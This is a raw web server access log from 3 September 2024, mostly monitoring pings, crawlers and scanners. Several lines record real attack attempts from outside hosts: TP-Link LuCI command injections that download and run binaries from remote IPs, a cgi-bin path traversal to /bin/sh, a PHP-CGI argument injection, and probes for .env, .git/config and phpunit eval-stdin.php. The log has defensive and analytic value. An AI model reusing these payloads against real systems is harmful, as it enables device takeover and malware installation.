212.95.49.158 - - [03/Sep/2024:14:08:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:14:08:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
149.50.103.48 - - [03/Sep/2024:14:09:01 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:14:10:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:12:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:14:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.211.139.188 - - [03/Sep/2024:14:15:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [03/Sep/2024:14:16:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:14:16:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:18:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:21:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:23:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
18.130.199.174 - - [03/Sep/2024:14:24:19 +0200] "GET /index.html HTTP/1.1" 200 1155 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
195.56.55.225 - - [03/Sep/2024:14:25:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:27:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:29:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.249.48.213 - - [03/Sep/2024:14:29:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
92.249.48.213 - - [03/Sep/2024:14:29:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 299 "http://195.56.55.226:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
92.249.48.213 - - [03/Sep/2024:14:29:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F89.32.41.95%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60)HTTP/1.1" 404 - "-" "-"
195.56.55.225 - - [03/Sep/2024:14:31:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.252 - - [03/Sep/2024:14:32:32 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:14:33:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:35:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:14:37:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:14:37:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:14:37:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [03/Sep/2024:14:39:07 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [03/Sep/2024:14:39:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [03/Sep/2024:14:41:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [03/Sep/2024:14:41:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:43:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:14:44:56 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:14:44:56 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:14:45:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:14:45:56 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:14:45:56 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.191.126.213 - - [03/Sep/2024:14:46:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
18.130.199.174 - - [03/Sep/2024:14:46:56 +0200] "\x16\x03\x01" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:14:47:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:14:49:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.211.139.188 - - [03/Sep/2024:14:50:34 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.22.143.72 - - [03/Sep/2024:14:51:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.32.2"
45.148.10.251 - - [03/Sep/2024:14:51:34 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [03/Sep/2024:14:51:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:14:53:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
94.156.68.162 - - [03/Sep/2024:14:53:35 +0200] "GET /.git/config HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56"
195.56.55.225 - - [03/Sep/2024:14:53:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
184.105.139.70 - - [03/Sep/2024:14:54:15 +0200] "\x16\x03\x01" 501 - "-" "-"
95.214.52.167 - - [03/Sep/2024:14:54:18 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
216.218.206.66 - - [03/Sep/2024:14:54:33 +0200] "\x16\x03\x01" 501 - "-" "-"
94.156.68.162 - - [03/Sep/2024:14:55:27 +0200] "GET /.git/config HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36"
92.249.48.213 - - [03/Sep/2024:14:55:50 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
92.249.48.213 - - [03/Sep/2024:14:55:51 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 299 "http://195.56.55.225:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
92.249.48.213 - - [03/Sep/2024:14:55:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F89.32.41.95%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60)HTTP/1.1" 404 - "-" "-"
195.56.55.225 - - [03/Sep/2024:14:55:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.84 - - [03/Sep/2024:14:57:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:14:58:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:00:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
18.130.199.174 - - [03/Sep/2024:15:00:13 +0200] "GET /login.jsp HTTP/1.1" 404 285 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
203.154.82.123 - - [03/Sep/2024:15:01:59 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 403 "-" "Custom-AsyncHttpClient"
203.154.82.123 - - [03/Sep/2024:15:02:01 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 297 "-" "Custom-AsyncHttpClient"
185.191.126.213 - - [03/Sep/2024:15:02:01 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
203.154.82.123 - - [03/Sep/2024:15:02:02 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Custom-AsyncHttpClient"
203.154.82.123 - - [03/Sep/2024:15:02:03 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 326 "-" "Custom-AsyncHttpClient"
89.190.156.137 - - [03/Sep/2024:15:02:06 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:15:02:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.82.77.202 - - [03/Sep/2024:15:03:11 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)"
124.243.190.73 - - [03/Sep/2024:15:03:44 +0200] "GET /kompasz/polgari_es_politikai_jogok_nemzetkozi_egysegokmany HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:15:04:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:15:05:06 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:15:05:06 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:15:06:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:15:07:15 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:15:07:15 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mme.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:15:07:15 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:15:07:16 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:15:08:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:15:08:49 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
198.235.24.204 - - [03/Sep/2024:15:10:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:15:10:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:12:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:15:13:45 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:14:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.108 - - [03/Sep/2024:15:16:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.108 - - [03/Sep/2024:15:16:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:15:16:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.164 - - [03/Sep/2024:15:18:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:15:18:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:15:20:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:20:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:22:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.67.45.97 - - [03/Sep/2024:15:23:58 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:24:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:26:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.233 - - [03/Sep/2024:15:28:28 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:15:28:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.53.197.83 - - [03/Sep/2024:15:30:30 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:30:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.176.178.50 - - [03/Sep/2024:15:32:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:32:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
88.247.113.133 - - [03/Sep/2024:15:34:15 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:15:35:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
88.247.113.133 - - [03/Sep/2024:15:36:06 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:15:37:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:39:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:41:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:15:42:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
89.190.156.137 - - [03/Sep/2024:15:42:46 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
91.233.21.70 - - [03/Sep/2024:15:42:54 +0200] "GET /.well-known/acme-challenge/NGUNJYGKJ6Q3M_CQG1RIJ8QEVXE9MMAB HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:15:42:54 +0200] "GET /.well-known/acme-challenge/M13YZ83EETCF5N6TN2RGP-JN2-K019OE HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:15:42:54 +0200] "GET /.well-known/acme-challenge/K-KU_121Z0GGD41FWDRV21X1M939I6SY HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:15:42:54 +0200] "GET /.well-known/acme-challenge/DU3-2EPFF0YZYNB_PMN33NW6CBVHB8X1 HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:15:42:55 +0200] "GET /.well-known/acme-challenge/XFZDV6A1SS6H1OFCGUH84466AOBQCA9U HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:15:42:55 +0200] "GET /.well-known/acme-challenge/TK81TD7YYAG6-OFJA51OWWAPJ48525KX HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [03/Sep/2024:15:43:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.66.193 - - [03/Sep/2024:15:43:58 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.193 - - [03/Sep/2024:15:43:58 +0200] "GET /www.brettonwoodsproject.org/briefings/econ/dbn/dbn2.pdf HTTP/1.1" 404 333 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
66.102.8.77 - - [03/Sep/2024:15:44:03 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
195.56.55.225 - - [03/Sep/2024:15:45:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:15:45:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
198.235.24.181 - - [03/Sep/2024:15:46:36 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
54.193.20.97 - - [03/Sep/2024:15:46:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:47:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.74 - - [03/Sep/2024:15:49:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:15:49:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:15:50:22 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
52.53.197.83 - - [03/Sep/2024:15:51:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:15:51:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
69.171.231.114 - - [03/Sep/2024:15:51:45 +0200] "GET /robots.txt HTTP/1.1" 404 289 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
149.50.103.48 - - [03/Sep/2024:15:51:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:15:53:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.84 - - [03/Sep/2024:15:54:10 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:15:55:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:15:57:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.66.19 - - [03/Sep/2024:15:59:33 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [03/Sep/2024:15:59:39 +0200] "GET /filmtext/2004-2005/Osz/Egyetemes3/Schrader-Bresson.pdf HTTP/1.1" 404 331 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [03/Sep/2024:15:59:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:01:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:03:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:05:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:07:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.16.39.118 - - [03/Sep/2024:16:09:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [03/Sep/2024:16:09:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:16:10:02 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:16:10:02 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:16:12:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:14:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:16:15:08 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:16:15:09 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
5.8.11.202 - - [03/Sep/2024:16:15:23 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Linux; Android 7.0; ASUS_X00GD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
195.56.55.225 - - [03/Sep/2024:16:16:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
103.114.107.59 - - [03/Sep/2024:16:16:30 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.114.107.59 - - [03/Sep/2024:16:16:32 +0200] "POST / HTTP/1.1" 405 310 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.95.49.158 - - [03/Sep/2024:16:16:54 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mtvsz.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:16:16:55 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.224.128.74 - - [03/Sep/2024:16:17:00 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
165.154.36.91 - - [03/Sep/2024:16:17:08 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
149.50.103.48 - - [03/Sep/2024:16:17:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
3.101.230.238 - - [03/Sep/2024:16:18:07 +0200] "HEAD / HTTP/1.1" 200 0 "-" "bitdiscovery"
195.56.55.225 - - [03/Sep/2024:16:18:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.59 - - [03/Sep/2024:16:20:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:16:20:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
136.243.228.181 - - [03/Sep/2024:16:22:01 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
136.243.228.181 - - [03/Sep/2024:16:22:01 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
